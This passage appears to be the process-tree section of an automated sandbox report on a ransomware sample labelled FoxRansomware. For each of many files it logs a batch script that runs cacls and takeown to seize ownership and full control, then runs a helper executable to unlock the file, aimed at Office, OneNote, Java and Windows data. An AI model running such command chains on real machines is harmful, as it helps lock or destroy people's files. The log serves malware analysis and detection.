C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2013CAWin64.xml"3⤵PID:5724
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "MicrosoftOutlook2013CAWin64.xml" -nobanner3⤵PID:2832
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "MicrosoftOutlook2013CAWin64.xml" -nobanner4⤵PID:5636
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7156
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Users\All Users\Microsoft\UEV\Scripts\RegisterInboxTemplates.ps1""2⤵PID:592
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\UEV\Scripts\RegisterInboxTemplates.ps1" /E /G Admin:F /C3⤵PID:5096
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\UEV\Scripts\RegisterInboxTemplates.ps1"3⤵
- Modifies file permissions
PID:7140
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "RegisterInboxTemplates.ps1" -nobanner3⤵PID:5616
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "RegisterInboxTemplates.ps1" -nobanner4⤵PID:6204
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:820
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006U.bin""2⤵PID:7884
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006U.bin" /E /G Admin:F /C3⤵PID:5024
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006U.bin"3⤵
- Modifies file permissions
PID:920
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "0000006U.bin" -nobanner3⤵PID:5364
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "0000006U.bin" -nobanner4⤵PID:5288
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6672
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000078.bin""2⤵PID:6048
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000078.bin" /E /G Admin:F /C3⤵PID:6156
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000078.bin"3⤵PID:6304
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "00000078.bin" -nobanner3⤵PID:3516
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "00000078.bin" -nobanner4⤵PID:3236
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1684
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007I.bin""2⤵PID:5608
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007I.bin" /E /G Admin:F /C3⤵PID:5204
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007I.bin"3⤵PID:6148
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "0000007I.bin" -nobanner3⤵PID:5344
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "0000007I.bin" -nobanner4⤵
- System Location Discovery: System Language Discovery
PID:5752
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6272
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008H.bin""2⤵PID:6364
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008H.bin" /E /G Admin:F /C3⤵PID:620
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008H.bin"3⤵PID:8176
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "0000008H.bin" -nobanner3⤵PID:3356
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "0000008H.bin" -nobanner4⤵PID:5484
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6412
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Program Files\Java\jre-1.8\bin\server\classes.jsa""2⤵PID:8148
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Java\jre-1.8\bin\server\classes.jsa" /E /G Admin:F /C3⤵PID:6392
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Java\jre-1.8\bin\server\classes.jsa"3⤵PID:5356
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "classes.jsa" -nobanner3⤵PID:6516
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "classes.jsa" -nobanner4⤵PID:5804
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7496
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Program Files\Java\jdk-1.8\jre\bin\server\classes.jsa""2⤵PID:6448
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Java\jdk-1.8\jre\bin\server\classes.jsa" /E /G Admin:F /C3⤵PID:6688
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Java\jdk-1.8\jre\bin\server\classes.jsa"3⤵
- Modifies file permissions
PID:5768
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "classes.jsa" -nobanner3⤵PID:6452
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "classes.jsa" -nobanner4⤵PID:8188
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6704
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000005.bin""2⤵PID:6708
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000005.bin" /E /G Admin:F /C3⤵PID:7488
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000005.bin"3⤵
- Modifies file permissions
PID:6820
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "00000005.bin" -nobanner3⤵PID:5416
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "00000005.bin" -nobanner4⤵PID:7480
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4288
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000I.bin""2⤵PID:6808
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000I.bin" /E /G Admin:F /C3⤵PID:6888
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000I.bin"3⤵PID:6764
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "0000000I.bin" -nobanner3⤵PID:5400
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "0000000I.bin" -nobanner4⤵PID:6812
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6928
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000T.bin""2⤵PID:4648
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000T.bin" /E /G Admin:F /C3⤵PID:6896
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000T.bin"3⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:7020
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "0000000T.bin" -nobanner3⤵PID:7800
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "0000000T.bin" -nobanner4⤵PID:7808
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5676
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000017.bin""2⤵PID:7516
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000017.bin" /E /G Admin:F /C3⤵PID:6320
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000017.bin"3⤵PID:6624
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "00000017.bin" -nobanner3⤵PID:6492
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "00000017.bin" -nobanner4⤵PID:7832
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6172
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006J.bin""2⤵PID:344
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006J.bin" /E /G Admin:F /C3⤵PID:7380
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006J.bin"3⤵PID:5264
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "0000006J.bin" -nobanner3⤵PID:5056
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "0000006J.bin" -nobanner4⤵PID:4556
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5544
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007R.bin""2⤵PID:208
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007R.bin" /E /G Admin:F /C3⤵PID:3680
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007R.bin"3⤵
- Modifies file permissions
PID:4300
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "0000007R.bin" -nobanner3⤵PID:5756
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "0000007R.bin" -nobanner4⤵PID:7768
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7564
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000085.bin""2⤵PID:4044
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000085.bin" /E /G Admin:F /C3⤵PID:3192
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000085.bin"3⤵PID:7468
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "00000085.bin" -nobanner3⤵PID:7532
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "00000085.bin" -nobanner4⤵PID:7300
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7656
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008R.bin""2⤵PID:268
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008R.bin" /E /G Admin:F /C3⤵PID:7304
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008R.bin"3⤵PID:7244
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "0000008R.bin" -nobanner3⤵PID:280
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "0000008R.bin" -nobanner4⤵PID:7328
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2864
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009H.bin""2⤵PID:2316
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009H.bin" /E /G Admin:F /C3⤵
- System Location Discovery: System Language Discovery
PID:7708
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009H.bin"3⤵
- Modifies file permissions
PID:7792
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "0000009H.bin" -nobanner3⤵PID:7756
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "0000009H.bin" -nobanner4⤵PID:7712
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4084
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AD.bin""2⤵PID:7984
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AD.bin" /E /G Admin:F /C3⤵PID:7948
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AD.bin"3⤵PID:7892
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "000000AD.bin" -nobanner3⤵PID:8044
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "000000AD.bin" -nobanner4⤵PID:8108
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7268
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AN.bin""2⤵PID:32
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AN.bin" /E /G Admin:F /C3⤵PID:5968
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AN.bin"3⤵PID:7848
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "000000AN.bin" -nobanner3⤵PID:5172
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "000000AN.bin" -nobanner4⤵PID:5696
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7956
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000B3.bin""2⤵PID:7060
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000B3.bin" /E /G Admin:F /C3⤵PID:7088
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000B3.bin"3⤵PID:8024
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "000000B3.bin" -nobanner3⤵PID:7908
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "000000B3.bin" -nobanner4⤵PID:7040
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7100
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\Settings\settings.dat""2⤵PID:2968
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\Settings\settings.dat" /E /G Admin:F /C3⤵PID:5500
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\Settings\settings.dat"3⤵PID:7940
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "settings.dat" -nobanner3⤵PID:8124
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "settings.dat" -nobanner4⤵PID:5368
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵
- System Location Discovery: System Language Discovery
PID:8156
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Users\All Users\Microsoft\AppV\Setup\OfficeIntegrator.ps1""2⤵PID:7112
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\AppV\Setup\OfficeIntegrator.ps1" /E /G Admin:F /C3⤵
- System Location Discovery: System Language Discovery
PID:5980
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\AppV\Setup\OfficeIntegrator.ps1"3⤵PID:8112
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "OfficeIntegrator.ps1" -nobanner3⤵PID:5628
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "OfficeIntegrator.ps1" -nobanner4⤵PID:4216
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7036
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml""2⤵PID:2332
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml" /E /G Admin:F /C3⤵PID:2224
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml"3⤵
- Modifies file permissions
PID:5184
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "resource.xml" -nobanner3⤵PID:5948
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "resource.xml" -nobanner4⤵PID:4812
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5320
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml""2⤵PID:5424
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml" /E /G Admin:F /C3⤵
- System Location Discovery: System Language Discovery
PID:2376
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml"3⤵PID:5348
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "resource.xml" -nobanner3⤵PID:688
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "resource.xml" -nobanner4⤵PID:7120
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5092
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Users\All Users\Microsoft\Diagnosis\DownloadedScenarios\WINDOWS.SIUF.xml""2⤵PID:8008
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Diagnosis\DownloadedScenarios\WINDOWS.SIUF.xml" /E /G Admin:F /C3⤵PID:5720
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Diagnosis\DownloadedScenarios\WINDOWS.SIUF.xml"3⤵
- Modifies file permissions
PID:4664
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "WINDOWS.SIUF.xml" -nobanner3⤵PID:4328
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "WINDOWS.SIUF.xml" -nobanner4⤵PID:5472
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5468
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Users\All Users\Microsoft\Diagnosis\osver.txt""2⤵PID:4268
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Diagnosis\osver.txt" /E /G Admin:F /C3⤵PID:7164
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Diagnosis\osver.txt"3⤵
- Modifies file permissions
PID:5640
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "osver.txt" -nobanner3⤵PID:5556
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula "osver.txt" -nobanner4⤵PID:5852
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\5E68lMYn.exe5E68lMYn.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5504
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\hX6QH9vE.bat" "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\edb.log""2⤵PID:5660
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\edb.log" /E /G Admin:F /C3⤵PID:4244
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\edb.log"3⤵PID:6224
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 5E68lMYn.exe -accepteula "edb.log" -nobanner3⤵PID:6160
-
